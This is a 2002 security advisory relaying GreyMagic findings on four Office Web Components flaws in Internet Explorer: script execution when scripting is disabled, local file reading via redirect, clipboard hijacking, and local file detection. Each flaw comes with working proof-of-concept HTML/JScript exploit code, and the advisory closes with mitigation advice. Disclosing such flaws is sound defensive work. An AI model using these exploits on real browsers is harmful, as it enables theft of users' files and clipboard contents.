26th Sep 2002 [SBWID-5254]
COMMAND
Multiple vulnerabilities via Office Web Components / IE
SYSTEMS AFFECTED
IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE6 Win2000 + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + OWC10, all patches.
IE6sp1 Win2000 + OWC10, all patches.
IE6 WinXP + Office XP (OWC10), all patches.
IE6sp1 WinXP + Office XP (OWC10), all patches.
PROBLEM
In GreyMagic Security [http://security.greymagic.com] advisories
[GM#005-IE] [GM#006-IE] [GM#007-IE] [GM#008-IE] :
GeyMagic security team unveiled multiple vulnerabilities in office web
components,
Introduction:
=============
Office Web Components (OWC) is a group of safe for scripting components
used to enrich HTML documents with Spreadsheets, Charts, Pivot tables
and more.
OWC ships with the Microsoft Office package, but it is also
downloadable as a separate (free for viewing only) component.
Vulnerability N�1 : Scripting for the scriptless
================================================
Office XP introduced OWC10, which added many interesting features. One
of the features added to the Spreadsheet component is the "=HOST()"
formula, which returns a handle to the hosting environment.
It is possible to use this formula in order to manipulate the DOM,
which is a security issue in itself when Active Scripting is disabled,
but it's somewhat limited because there's no way to add logic
(conditions, loops, etc.) to the calls made.
However, with a bit of manipulation it is possible to get Active
Scripting to kick in. By using the setTimeout method of the window
object through the "=HOST()" formula it is possible to execute script
with any language available to the host (IE).
Exploit:
========
This example will display a message box even when scripting is
disabled; it contains many quotes because several levels of escaping
are needed:
<object classid="clsid:0002E551-0000-0000-C000-000000000046"
style="display:none">
<param
name="csvdata"
value='"=HOST().parentWindow.setTimeout(""var i=20; alert(i+""""+3
equals """"+(i+3));"",10,""jscript"")"'
>
</object>
See : [http://security.greymagic.com/adv/gm005-ie/]
Vulnerability N�2 : Reading local files
=======================================
Using the Spreadsheet component in both OWC9 and OWC10, it is possible
to read any local or remote file.
The "LoadText" method of the Range object takes a URL as its first
argument; it throws an error if the URL supplied is not in the same
domain as the current document.
However, this protection can be easily bypassed by supplying a URL that
will redirect to the desired local or remote file.
OWC is fooled to think that the URL is safe and loads the contents of
the file into the spreadsheet; it is then trivial to retrieve the
content and transfer it to the server or use it in malicious ways.
Exploit:
========
This example reads the contents of the file "c:/test.txt", the URL
"getFile.asp" is redirecting to "file://c:/test.txt", allowing us to
access it:
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
try {
// Load file into spreadsheet
oSP.ActiveSheet.UsedRange.LoadText("getFile.asp");
// Read the spreadsheet
var oRng=oSP.ActiveSheet.UsedRange,
iRows=oRng.Rows.Count,
iCols=oRng.Columns.Count,
sRes="";
for (var iCRow=1;iCRow<=iRows;iCRow++) {
for (var iCCol=1;iCCol<=iCols;iCCol++) {
sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
}
sRes+="\n";
}
// Display result
alert(sRes);
}
catch (oErr) {
// Failed
alert("File not found.");
}
}
</script>
The class id of the <object> element above is for the spreadsheet
component of OWC9 (Microsoft Office 2000), OWC10's class id is
"0002E551-0000-0000-C000-000000000046", no further changes in code are
needed.
An attacker can actually use the fallback feature of the <object>
element to include either one of these components:
<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
style="display:none">
<!-- Failed, try to include OWC9 -->
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
style="display:none">
<!-- None found -->
Failed to load any of the spreadsheet components.
</object>
</object>
See : [http://security.greymagic.com/adv/gm006-ie/]
Vulnerability N�3 : Controlling the clipboard
=============================================
It is well documented that IE lets anybody read and write clipboard
data by default, until now it was possible to disable this feature by
setting "Allow paste operations via script" to "Disable".
It is now possible to gain control over the clipboard even when it is
disabled in the security zone, via the Spreadsheet component in both
OWC9 and OWC10.
The "Paste" method of the Range object and the "Copy" method of the
Cell object both give an attacker full control over clipboard
operations.
The attacker can continuously monitor the victim's clipboard and log
the findings to a server for later inspection. It is also possible for
an attacker to place data inside the clipboard.
Exploit:
========
Reading the contents of the clipboard:
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
// Paste to spreadsheet
oSP.ActiveSheet.UsedRange.Paste();
// Read the spreadsheet
var oRng=oSP.ActiveSheet.UsedRange,
iRows=oRng.Rows.Count,
iCols=oRng.Columns.Count,
sRes="";
for (var iCRow=1;iCRow<=iRows;iCRow++) {
for (var iCCol=1;iCCol<=iCols;iCCol++) {
sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
}
sRes+="\n";
}
// Display result
alert(sRes);
}
</script>
Assigning the clipboard's content:
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP"
style="display:none"></object>
<script language="jscript">
onload=function () {
oSP.Cells(1,1).Value="Trustworthy computing";
oSP.Cells(1,1).Copy();
}
</script>
The class id of the <object> element above is for the spreadsheet
component of OWC9 (Microsoft Office 2000), OWC10's class id is
"0002E551-0000-0000-C000-000000000046", no further changes in code are
needed.
An attacker can actually use the fallback feature of the <object>
element to include either one of these components:
<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10"
style="display:none">
<!-- Failed, try to include OWC9 -->
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9"
style="display:none">
<!-- None found -->
Failed to load any of the spreadsheet components.
</object>
</object>
See : [http://security.greymagic.com/adv/gm007-ie/]
Vulnerability N�4 : Multiple local files detection
==================================================
There are several ways to check whether local files exist using OWC9
and OWC10.
The first vulnerability is in the Chart component in both OWC9 and
OWC10. The "Load" method does not perform any security check on the
assigned URL and throws an error when given a file name that does not
exist, otherwise the file exists.
The second vulnerability is in the Spreadsheet component in OWC10. The
"XMLURL" property blindly follows redirections, so it is possible to
assign it a URL which redirects to a local file and determine whether
it exists or not by the error thrown. It is also possible to read
properly formatted WorkSheet XML files from disallowed locations in the
same way.
The third vulnerability is in the DataSourceControl component in OWC10.
The "ConnectionFile" property does not perform any security checks on
the assigned URL. Therefore, it is possible to assign a local file and
determine whether it exists or not by the error thrown.
Exploit:
========
A simple exploit for the first vulnerability:
<object id="oCS" classid="clsid:0002E500-0000-0000-C000-000000000046"
style="display:none"></object>
<!-- For OWC10 the clsid is "0002E556-0000-0000-C000-000000000046" -->
<script language="jscript">
onload=function () {
try {
oCS.Load("file://c:/test.txt");
alert("File exists!");
}
catch (oErr) {
alert("File does not exist.");
}
}
</script>
A simple exploit for the second vulnerability, "getFile.asp" internally
redirects to "file://c:/test.txt":
<object id="oSP" classid="clsid:0002E551-0000-0000-C000-000000000046"
style="display:block"></object>
<script language="jscript">
onload=function () {
try {
oSP.XMLURL="getFile.asp";
}
catch (oErr) {
alert(oErr.description.indexOf("valid path")==-1 ? "File exists!" :
"File does not exist.");
}
}
</script>
A simple exploit for the third vulnerability:
<object id="oDS" classid="clsid:0002E553-0000-0000-C000-000000000046"
style="display:block"></object>
<script language="jscript">
onload=function () {
try {
oDS.ConnectionFile="file://c:/test.txt";
}
catch (oErr) {
alert(oErr.number==-2146697211 ? "File does not exist." : "File
exists!");
}
}
</script>
See : [http://security.greymagic.com/adv/gm008-ie/]
SOLUTION
Set "Run ActiveX controls and plug-ins" to "Disable" or simply
remove/disable OWC until a patch becomes available.
No patches yet.